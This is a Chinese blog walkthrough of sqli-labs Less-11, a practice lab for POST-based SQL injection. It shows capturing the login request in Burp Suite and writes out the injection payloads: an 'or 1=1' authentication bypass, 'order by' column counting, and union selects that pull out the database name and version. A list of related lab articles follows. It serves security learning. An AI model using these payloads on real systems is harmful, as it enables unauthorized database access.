POST注入通过sqli-labs靶场less-11

最新推荐文章于 2024-11-09 10:31:18 发布
最新推荐文章于 2024-11-09 10:31:18 发布
阅读量365 收藏 9
点赞数 6
分类专栏: sqli-labs靶场 文章标签: less 前端 css 安全 数据库 sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wanggonghanfei/article/details/142734433
版权

在这里插入图片描述

POST注入原理

在这里插入图片描述

原理介绍

进入第十一关靶场,我们发现是一个登录窗口,随意提交数据,显示
在这里插入图片描述
在url地址进行get提交,发现一直是登录窗口,页面无其他变化,想到post提交注入。

通关原理

打开靶场源码文件。

在这里插入图片描述
查看提交方式。
在这里插入图片描述
我们可以添加语句来查看我们提交语句后后台查询的语句

echo $sql;

在这里插入图片描述

进行注入

可以使用hackbar插件进行post提交注入,也可以使用burp suite进行注入,本次使用burpsuite
随意提交参数
在这里插入图片描述
报错登陆失败,图片中黄色部分是因为前面添加的echo $sql;在实际的环境中,我们需要经验来猜测和尝试,加上是方便大家理解原理。
抓包发送到burpsuite。抓包数据
在这里插入图片描述
将其发送到Repeater模块。

判断闭合方式,列数,回显位置

因为我们查看过源码,知道闭合方式为单引号,在实际测试中可以尝试各种闭合方式。比如','),')),","),"))等。
post提交语句
.>uname=asf’ or 1=1 --+ &passwd=asdg&submit=Submit
在这里插入图片描述
可以看到 SELECT username, password FROM users WHERE username=‘asf’ or 1=1 --+’ and password=‘’ LIMIT 0,1为查询语句,这是web服务器接收到的,再进行数据库查询比对时,实际语句为

SELECT username, password FROM users WHERE username='asf’ or 1=1;

判断列数

uname=asf’ order by 4 --+ &passwd=asdg&submit=Submit

在这里插入图片描述
4的时候不对,当为2时,显示正确,列数为2.
回显位置:

uname=asf’ union select 1,2 --+ &passwd=asdg&submit=Submit

查询数据库

uname=asf ’ union select database(),version() --+ &passwd=asdg&submit=Submit

在这里插入图片描述
爆数据库
在这里插入图片描述
在这里插入图片描述

其他操作与union注入语句大差不差

子非鱼999
关注
专栏目录
毕业实习(五)SQL注入sqli-labs靶场
Nightwiggle的博客
09-02 2079
1.信息收集:识别目标应用的输入点(如表单字段、URL参数、HTTP头部等),并了解应用的数据库类型和结构。2.测试点注入:在输入字段中尝试插入简单的SQL注入payload(如`' OR '1'='1`),观察应用的响应来确定是否存在SQL注入漏洞。3.确定注入类型:-错误基于注入:观察SQL错误消息,推测数据库结构。-盲注:通过不同的响应时间或页面行为判断数据库内容(如时间延迟注入)。
SQL注入SQLI-LABS靶场通关秘籍
Sunnie_yoo的博客
07-03 1467
反之,参数不符合规范,则会触发报错,我们就是利用这个,通过 updatexml() 函数的报错回显我们需要的信息。注入流程与 Less-5 类似,不过这里的判断标准不是回显的信息,而是响应时间。因此网页存在字符型注入漏洞,并且使用单引号和括号进行闭合,注意到此网页并没有返回任何信息,我们需要使用 Bool 盲注进行注入注入万能密码试试,用户名随便写点东西,使用 OR 运算符构造恒真条件,使用“#”注释掉后面的内容注入,网页提示我们注入成功,由于此时使用的时单引号闭合,因此这里是字符型注入
Sqli-labs靶场11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1546
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 831
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 819
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
Sqli-labs靶场第15关详解[Sqli-labs-less-15]自动化注入-SQLmap工具注入
m0_73615178的博客
03-02 908
由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。
SQL注入sqli-labs靶场(1-22关) sqlmap注入
good good study day day up
06-29 927
SQL注入 sqli-labs靶场(1-22关) sqlmap注入
Sqli-labs靶场第19关详解[Sqli-labs-less-19]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 798
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。
sql注入sqli-labs靶场前几关讲解
m0_70483044的博客
01-09 2085
sql注入简介SQL注入是一种常见的web安全漏洞。sql注入是通过恶意的sql查询或者添加语句插入到应用的输入参数中,再在后台sql服务器解析执行进行的攻击。sql注入原因在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的"数据"拼接到SQL语句中,被当作是SQL语句的一部分执行,从而导致数据库受损。是目前黑客对数据库进行攻击的最常用手段之一。sql注入攻击对象数据库漏洞原因分析web分别前端和后端,前端负责进行展示后端负责处理来自前端的请求并提供前端展示的资源。
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
如何使用 Puppeteer 和 Browserless 抓取亚马逊产品数据?
wellshake的博客
11-08 878
您可以在亚马逊上找到所有有关产品、卖家、评论、评分、特价、新闻等的相关且有价值的信息。无论是卖家进行市场调研还是个人收集数据,使用高质量、便捷且快速的工具将极大地帮助您准确地抓取亚马逊上的各种信息。
Webserver(3.3)生产者消费者模型
学习历程记录和分享
11-05 361
解决该问题需要用互斥量确保线程同步,用条件变量或者信号量去解决生产者和消费者之间同步的问题,生产者把数据生产满了要通知消费者去消费。会产生数据安全问题,比如生产者还未生产出来,就去消费。
vxe-grid ,增加新行,并且定位到新增的行
花花鱼的专栏
11-05 226
vxe-grid新增空行,并且定位到空行位置。
WPF+MVVM案例实战与特效(二十五)- 3D粒子波浪效果实现
lingshuangcanxue
11-05 300
使用WPF的3D控件以及动画效果实现3D粒子波浪的特效
在 .NET 6.0 中创建用于 CRUD 操作的 Web API
最新发布
csdn_aspnet的专栏
11-09 539
为了保持代码库的简洁高效,建议从 ProductDBContext.cs 中删除 OnConfiguring() 方法,因为它包含数据库连接字符串,为了更好地组织,应该以不同的方式管理它。NET 6 Web API 是一个先进的框架,一个精心设计的创新框架,用于构建针对 Web 应用程序个性化的弹性应用程序编程接口。为了适应 .NET 6 中引入的更改,现在在 Program.cs 文件中进行了配置调整,因为 Startup.cs 不再用于配置。CRUD 是创建、读取、更新和删除的首字母缩写词。
vue2 -- el-form组件动态增减表单项及表单项验证
King Saj
11-06 119
在数据录入场景(如订单信息录入)中,可根据实际情况(如商品种类增加)动态添加表单项(如商品相关信息)。包含必填项验证和数据格式验证(如邮箱、电话格式),防止错误数据提交。// 此处执行错误的逻辑。// 执行父组件回调。
vue种ref跟reactive的区别?
renqq001的博客
11-07 592
vue种ref跟reactive的区别?
Webserver(5.1)五种IO模型
学习历程记录和分享
11-08 262
容易出现EAGAIN,就是时间还未发生,根据errno来决定。IO事件就绪,进程收到SIGIO信号,然后处理IO事件。在通知SIGIO阶段是异步的,可以去做自己的事情。调用某个函数,等待这个函数返回,期间什么也不做,不停地去检查这个函数有没有返回,必须等返回才能进行下一步动作。同步的话就是客户端主动一点去接收数据,异步的话就比较被动,等着对方通知你来接收数据。在处理IO的时候,阻塞与非阻塞都是同步IO,只有使用了特殊的API才是异步IO。同步就是recv去读取数据,异步是内核把buf准备好了会发信号通知。
前端md5加密
Xiang_Gong_Ya_的博客
11-07 224
md5Pwd(加密后的数据)
支持PHP7的sqli-labs靶场介绍
总结来说,sqli靶场支持php7是一个专注于PHP 7环境下SQL注入学习的实践平台,通过sqli-labs靶场,用户可以在一个安全的环境中学习和掌握SQL注入的相关知识,提高自身在网络安全领域的专业技能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值